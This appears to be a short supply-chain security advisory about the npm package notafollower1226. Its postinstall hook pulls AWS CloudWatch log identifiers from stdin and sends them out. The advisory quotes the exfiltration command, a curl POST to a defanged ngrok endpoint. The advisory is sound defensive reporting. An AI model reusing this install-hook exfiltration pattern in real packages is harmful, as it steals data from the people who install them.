LWA-2026-11248 confirmed malware

notafollower1226@1.0.0

Malicious code in notafollower1226 (npm)

T1059.007 · JavaScriptT1071.001 · Web ProtocolsT1041 · Exfiltration Over C2 Channel

Analysis

The package ships no code — only a postinstall hook. On install, the hook runs a node one-liner that reads stdin, parses JSON lines, and extracts AWS CloudWatch log group and log-stream identifiers (LogOptions['awslogs-group'] / 'awslogs-stream'), then pipes the collected values to `curl -X POST hxxps://mourner-slot-explicit[.]ngrok-free[.]dev --data-binary @-`, exfiltrating the data to an attacker-controlled ngrok tunnel endpoint.

analyzed by
Leitwacht
first seen
Aug 13, 2026, 11:19 PM
analyzed
Aug 13, 2026, 11:22 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.